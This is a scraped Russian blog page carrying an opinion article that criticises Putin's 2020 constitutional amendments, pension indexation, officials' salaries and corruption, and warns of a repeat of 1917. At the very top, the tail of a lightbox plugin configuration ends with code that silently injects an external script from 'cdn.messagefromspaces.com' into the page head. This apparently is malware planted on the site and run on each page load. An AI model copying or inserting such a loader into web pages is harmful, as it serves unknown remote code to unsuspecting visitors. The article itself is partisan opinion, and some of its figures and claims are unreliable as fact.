, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Почему Путин не сказал, как «трагедия прошлого нас должна объединять»?

20 Мар

На встрече с представителями   https://tass.ru/obschestvo/8018651?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews  общественности Крыма и Севастополя Путин упомянул события Октябрьской революции 1917 года, признав, что это было прологом к огромной внутригосударственной трагедии, в результате которой погибли миллионы людей.

Однако призвал: «"Если мы хотим иметь уверенное, хорошее будущее, нужно преодолеть все эти расколы прошлого и вместе двигаться вперед".

При этом Путин даже не назвал эти самые «расколы прошлого».

Он рекомендовал «преодолеть раскол в душе, в сердце». Но видя то, что происходит сегодня в России, мой разум не соглашается с такой рекомендацией.

Путин говорит:  «Несмотря на разницу в подходах и в понимании того, что нужно делать для будущего, трагедия прошлого нас должна объединять в мысли о том, что ничего подобного мы никогда повторить не можем и не должны».

Но анализируя события, приведшие к Октябрьской революции 1917 года, а также то, что происходит в стране за последние 20 лет, прихожу к выводу, что в обществе создаются условия, которые порождают новую внутригосударственную трагедию.

Казалось, что глава государства осознал ту несправедливость, которая возникла в обществе в результате рукотворной деятельности его назначенцев, и решился на исполнение обязанностей гаранта Конституции, которые только и способны защитить общество от новой внутригосударственной трагедии.

Несмотря на то, что действующим законодательством чиновникам и депутатам  ещё в 2006 году было запрещено иметь гражданство иностранных государств, они эти требования закона игнорировали.

Поэтому Путин решился http://kremlin.ru/events/president/news/62582   на поправку в Конституцию, запрещающую  чиновникам и депутатам иметь иностранное гражданство, вид на жительство либо иной документ, который позволяет постоянно проживать на территории другого государства.

Он считает: «Смысл, миссия государственной службы именно в служении, и человек, который выбирает этот путь, должен, прежде всего, для себя решить, что он связывает свою жизнь с Россией, с нашим народом, и никак иначе, без всяких полутонов и допущений».

Но никто из чиновников и депутатов, обладателей недвижимости за рубежом, счетов и вида на жительство за границей, не покинули добровольно свои посты.

Более того, некоторые из нах возглавили рабочие группы по дополнениям к Конституции.

Например, сопредседатель рабочей группы по обсуждению поправок в конституцию Андрей Клишас  стал утверждать https://ria.ru/20200306/1568236643.html?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews     , что планов внести в Конституцию поправки, запрещающие чиновникам владеть недвижимостью за рубежом, никогда не было.

Глава комитета Госдумы по госстроительству и законодательству Павел Крашенинников заявил https://www.gazeta.ru/politics/news/2020/03/06/n_14124889.shtml?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews    , что запрет для депутатов и чиновников на владение имуществом за границей не имеет смысла.

По мнению парламентария, не существует объективных причин, из-за которых депутаты должны отказываться от имущества, если оно оформлено законным путем.

Если глава комитета Госдумы не понимает то, о чём говорит глава государства, как он может осуществлять законодательство, помогающее гаранту Конституции исполнять его обязанности?

А нам за такие усечённые поправки предлагают 22 апреля проголосовать.

Беда оказалась и с индексацией пенсий. Поэтому Путин сказал, что об индексации пенсий  в Конституции нужно сказать.

При этом он пояснил, что когда в общем законе какая-то социальная норма прописана, а потом принимается закон о бюджете и вносится в него статья, которой приостанавливаются другие законы и социальные обязательства сносятся, как говорят, вправо, то есть на следующие годы.

Но «социальные обязательства сносятся» при активном участии в этом гаранта Конституции, что клятвенно обещал уважать и охранять права и свободы человека и гражданина, соблюдать и защищать Конституцию России.

Именно Путин подписал http://www.kremlin.ru/acts/news/53514  Федеральный закон «О федеральном бюджете на 2017 год и на плановый период 2018 и 2019 годов», которым лишил миллионы работающих пенсионеров индексации их пенсий.

Разве это не трагедия и унижение для миллионов работающих россиян?

Искусственно созданное неравенство в оплате труда создаёт новые условия для повторения событий Октября 1917 года.

Министр экономики Силуанов получает за месяц,  сумму большую той,  что получают за год  лишь 15 человек среди директоров http://www.info-gzl.com/news/show/skolko-poluchayut-kitayskie-chinovniki   госсектора в Китае.

В стране установили унизительный прожиточный минимум в 12 тыс. руб., к нему приравняли минимальную зарплату, но те, кто это устанавливали, себе потребовали  зарплаты в 100−150 раз большие, чем «минималка». И Путин с этим согласился.

В экономически развитых стран Европы и США, сенаторы, министры и иные чиновники получают зарплату в 2−6 раз, превышающую среднюю зарплату по стране.

В США зарплата депутата только в 11 раз превосходит минимальную, а в России зарплата https://zen.yandex.ru/media/show_me_world/sravnenie-zarplat-deputatov-po-stranam-mira-5e4d0c976e1cd54e7a5ce004     депутата в 35 раз превосходит минимальную. Но они уже заложили в бюджет  зарплату депутата, превышающею «минималку» в 70 раз.

При этом пытаются на всех ТВ рассуждать о совести и о праве на справедливость.

Умерить алчность  чиновников, депутатов и иных менеджеров госпредприятий  путём конституционного определения размеров их оплаты в виде 10−15 минимальных зарплат, Путин не  решился.

Путин, почему-то убеждён, что россиянин, получающий полторы минимальных заработных платы, хорошо обеспеченный человек и уже попадает в средний https://www.rbc.ru/society/18/03/2020/5e71c7fd9a79478083068ee2?utm_source=yxnews&utm_medium=desktop&utm_referrer=https%3A%2F%2Fyandex.ru%2Fnews  класс. А таковых в России 70%.

Возможно, предстоящее голосования по поправкам в Конституцию и подтвердит это. Именно эти 70% россиян и отдадут свои голоса.

Миллионы пенсионеров, имеющих трудовой стаж в 30−50 лет, получают пенсии в 8−10 тысяч рублей, что ниже прожиточного минимума.

Для страны с Крымом, Арктикой, Калининградом и Курилами. Обеспечивающей газом, нефтью, древесиной, морепродуктами и металлом десятки стран, иначе, как позором такие пенсия назвать нельзя.

Казалось, что и Путин это осознал, заговорив о «принципах достойного пенсионного обеспечения».

Я публично  предлагал считать достойным минимальным пенсионным обеспечением сумму, равную двум размерам  прожиточного минимума трудоспособного населения, а  дальнейшее её увеличение  её определять стажем работы.

Именно это и надо было закрепить в Конституции России.

Но Путин о достойном пенсионном обеспечение больше не вспоминал.

Так, что же может ли объединить миллионы пенсионеров и работающих россиян, получающих за свой труд  ниже прожиточного минимума, с теми, кто взялся осуществлять государственную власть и себе установил зарплаты, превышающие в 100−150 раз этот минимум?

Но и этого им мало.

В каждом регионе чиновники соучаствуют совместно с предпринимателями в разворовывании бюджетных средств.

По оценкам многих экспертов, реальный объем всеобщего должностного воровства в стране, составляет  не менее 8−10 триллионов рублей в год.

Рассказывают, что рекорд https://echo.msk.ru/blog/gudkov/2570801-echo/?utm_referrer=https%3A%2F%2Fzen.yandex.com   по откатам составил  90%. Его  московские чиновники потребовали с одного научно-производственного Института на изготовлении медицинских препаратов (он там был монополистом). Вопрос стоял перед директором очень просто: либо ты соглашаешься, либо мы тебя полностью разорим. Директор боялся, чуть не плакал, но принял условия из миллиардного заказа «вернуть» почти 900 млн.

Медведев, чья деятельность признана официально https://lenta.ru/news/2020/02/06/out/   удручающей, убеждал нас, что «денег нет» и просил потерпеть.

Вот они средства, которыми можно было бы, и установить достойный прожиточный минимум и достойные пенсии.

Даже глава Дагестана Владимир Васильев говорит https://www.riadagestan.ru/news/president/vladimir_vasilev_my_ne_mozhem_bezuchastno_vzirat_na_roskosh_ne_podtverzhdyennuyu_ofitsialnymi_dokhodami/?utm_referrer=https%3A%2F%2Fzen.yandex.com  : «Мы не можем безучастно взирать на роскошь, не подтверждённую официальными доходами».

Но в каждом регионе страны россияне вынуждены безучастно взирать на роскошь, не подтверждённую официальными доходами чиновников.

История показывает, что от  презрения к тем, кто так осуществляет государственную власть, народ переходит к решительным действиям.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.